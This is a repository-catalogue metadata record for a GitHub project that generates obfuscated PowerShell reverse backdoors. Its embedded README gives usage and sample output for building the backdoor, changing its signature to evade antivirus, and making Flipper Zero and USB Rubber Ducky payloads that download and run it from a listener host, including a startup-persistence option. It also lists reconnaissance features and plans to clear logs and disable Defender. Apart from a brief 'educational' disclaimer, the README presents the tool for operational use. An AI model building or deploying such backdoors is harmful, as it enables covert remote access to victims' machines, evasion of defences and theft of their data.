{"id":21361396,"url":"https://github.com/drew-alleman/powershell-backdoor-generator","last_synced_at":"2025-04-06T16:14:27.626Z","repository":{"id":58175160,"uuid":"530411780","full_name":"Drew-Alleman/powershell-backdoor-generator","owner":"Drew-Alleman","description":"Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.","archived":false,"fork":false,"pushed_at":"2023-06-19T21:05:18.000Z","size":320,"stargazers_count":358,"open_issues_count":4,"forks_count":61,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-03-30T15:08:34.164Z","etag":null,"topics":["backdoor","bad-usb","ethical-hacking","flipper-zero","hacking","hak5","hak5-ducky","hak5-rubber-ducky","obfuscation","powershell","powershell-backdoor","powershell-hacking","python","python-hacking","reverse-backdoor","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Drew-Alleman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-08-29T22:17:12.000Z","updated_at":"2025-03-30T14:27:40.000Z","dependencies_parsed_at":"2024-12-23T19:12:49.102Z","dependency_job_id":"a31f999c-af89-4406-b4eb-937be51561fb","html_url":"https://github.com/Drew-Alleman/powershell-backdoor-generator","commit_stats":{"total_commits":139,"total_committers":1,"mean_commits":139.0,"dds":0.0,"last_synced_commit":"90fe7835f15375f29d7ff015b7f60d8a0c7c3511
"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Drew-Alleman%2Fpowershell-backdoor-generator/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Drew-Alleman","download_url":"https://codeload.github.com/Drew-Alleman/powershell-backdoor-generator/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247509237,"owners_count":20950232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bad-usb","ethical-hacking","flipper-zero","hacking","hak5","hak5-ducky","hak5-rubber-ducky","obfuscation","powershell","powershell-backdoor","powershell-hacking","python","python-hacking","reverse-backdoor","windows"],"created_at":"2024-11-22T06:09:38.329Z","updated_at":"2025-04-06T16:14:27.608Z","avatar_url":"https://github.com/Drew-Alleman.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"```\n/******************************************************************************\n * DISCLAIMER: \n * \n * This program is intended for educational purposes only. 
By using this program,\n * you agree that you understand the potential risks associated with its use.\n * \n * - This program should not be used on any system or network without proper \n *   authorization. Unauthorized use is strictly prohibited.\n * \n * - The creator of this program assumes no liability for any damages, legal \n *   consequences, or loss of data caused by the use of this program.\n * \n * - It is your responsibility to ensure that you comply with all applicable \n *   laws and regulations while using this program.\n * \n * Please use this program responsibly and ethically, and respect the privacy \n * and security of others.\n *****************************************************************************/\n\n\n```\n\n# powershell-backdoor\n[![Guide](https://img.youtube.com/vi/C6_6-7b6P3E/0.jpg)](https://www.youtube.com/watch?v=C6_6-7b6P3E)\n\u003cbr\u003e\nReverse backdoor tool written in PowerShell and obfuscated with Python, providing a new signature after every build to avoid detection. The tool has the capability to create payloads for popular hacking devices such as Flipper Zero and Hak5 USB Rubber Ducky. 
Use this tool to test your system's defenses against advanced attack techniques.\n```\nusage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]\n                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]\n\nPowershell Backdoor Generator\n\noptions:\n  -h, --help            show this help message and exit\n  --ip-address IP_ADDRESS, -i IP_ADDRESS\n                        IP Address to bind the backdoor too (default: 192.168.X.XX)\n  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)\n  --random, -r          Randomizes the outputed backdoor's file name\n  --out OUT, -o OUT     Specify the backdoor filename (relative file names)\n  --verbose, -v         Show verbose output\n  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)\n  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)\n  --ducky               Creates an inject.bin for the http server\n  --server-port SERVER_PORT\n                        Port to run the HTTP server on (--server) (default: 8080)\n  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute\n  --list--payloads      List all available payloads\n  -k KEYBOARD, --keyboard KEYBOARD\n                        Keyboard layout for Bad Usb/Flipper Zero (default: us)\n  -A, --actually-listen\n                        Just listen for any backdoor connections\n  -H, --listen-and-host\n                        Just listen for any backdoor connections and host the backdoor directory\n```\n# Quick Links\n* [Preview](#preview)\n* [Features](#features)\n* [Standard Backdoor](#standard-backdoor)\n* [Flipper Zero Backdoor](#flipper-zero-backdoor)\n* [USB Rubber Ducky Backdoor](#usb-rubber-ducky-backdoor)\n* [Thanks](#thanks)\n* [To Do](#to-do)\n* [Output of 5 
Obfuscations](#output-of-5-obfuscations)\n\n## Preview\n![preview](/core/images/preview.PNG)\n\u003cbr\u003e\n\n## Features\n* Hak5 Rubber Ducky payload\n* Flipper Zero payload\n* Download files from the remote system\n* Play wav files from a URL\n* Fetch the target computer's public IP address\n* List local users\n* Find interesting files\n* Gather information about the target system's operating system\n* Retrieve BIOS information from the target system\n* Check if anti-virus software is installed and its current status\n* Get active TCP clients\n* Install Chocolatey, a popular package manager for Windows (https://chocolatey.org/)\n* Check if common pentesting software is installed on the target system\n\n## Standard backdoor\n```bash\nC:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --verbose\n[*] Encoding backdoor script\n[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nA file called backdoor.ps1 will be created in the current working directory.\n\n### Backdoor Execution\nTested on Windows 11, Windows 10 and Kali Linux. To run this as a hidden window and with persistent access, follow the guide [here](https://github.com/Drew-Alleman/powershell-backdoor-generator/issues/2#issuecomment-1546996105).\n```cmd\npowershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted\n```\n```cmd\n┌──(drew㉿kali)-[/home/drew/Documents]\n└─PS\u003e ./backdoor.ps1\n```\n\n# Bad USB/USB Rubber Ducky attacks\nWhen using any of these attacks you will be opening an HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shut down.\n\n## Payloads\n   * Execute -- Execute the backdoor\n   * BindAndExecute -- Place the backdoor in the user's temp directory, bind the backdoor to startup and then execute it. 
(Requires Admin)\n## Flipper Zero Backdoor\nThe command below generates a file called powershell_backdoor.txt which, when triggered on the Flipper, fetches the backdoor from your computer over HTTP and executes it.\n```\nC:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --flipper powershell_backdoor --payload execute\n[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nPlace the text file you specified (e.g. powershell_backdoor.txt) onto your Flipper Zero. When the payload is executed \nit will download and execute backdoor.ps1.\n\n## USB Rubber Ducky Backdoor\nBelow is a tutorial on how to generate an inject.bin file for the Hak5 USB Rubber Ducky.\n```\nC:\\Users\\DrewQ\\Desktop\\powershell-backdoor-main\u003e python .\\listen.py --ducky --payload BindAndExecute\n[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1\n[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop\n```\nA file named inject.bin will be placed in your current working directory. Java is required for this feature. 
When the payload is executed \nit will download and execute backdoor.ps1.\n\n## Thanks\nTo encode payload.txt into inject.bin for USB Rubber Ducky Attacks I use encoder.jar created by [midnitesnake](https://github.com/midnitesnake).\n\n## To Do\n* Pull Recent RDP connections\n* Change Wallpaper from URL\n* Find Writeable Directories\n* Clear Logs\n* Disable Defender\n\n## Output of 5 Obfuscations\nBelow are the SHA-1 hashes of backdoor.ps1 after 5 builds.\n```\n1e158f02484e5c58d74c1507a1773392ffacfca2\n6d18230a419195d0f77519abc0238768956cdd58\n558a8cbac40239c9e6660a45cc8fc5d02b5057d7\ncaf4d0c8424eceb960d5f5c526e83ecd485c4ac9\n947b57824917842d79f9cbcac8a795aa7c2f8a49\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdrew-alleman%2Fpowershell-backdoor-generator/lists"}